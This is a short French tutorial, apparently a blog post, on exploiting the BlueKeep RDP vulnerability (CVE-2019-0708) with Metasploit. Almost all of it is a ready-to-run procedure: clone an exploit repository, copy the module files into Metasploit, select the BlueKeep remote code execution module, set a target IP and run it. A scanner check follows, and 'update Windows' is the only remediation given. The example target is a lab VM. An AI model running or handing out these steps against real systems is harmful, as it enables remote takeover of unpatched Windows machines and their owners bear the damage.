Bluekeep_rce

# Download exploit 
git clone https://github.com/TinToSer/bluekeep-exploit

# remplacer ces fichiers
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp /
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp /

# Pour une utilisation propre, créer le répertoire contenant l'exploit
mkdir /usr/share/metasploit-framework/modules/exploit/rdp
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploit/rdp/

# Ensuite on peut lancer l'exploit
msfdb start
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOST 192.168.56.101 (ex:@ip vm)
set TARGET 2 (sélection os sytem vm)
run (ou exploit)

# Pour effectuer un check
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOST 192.168.56.101
run

Solution

Mettre à jour Windows

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *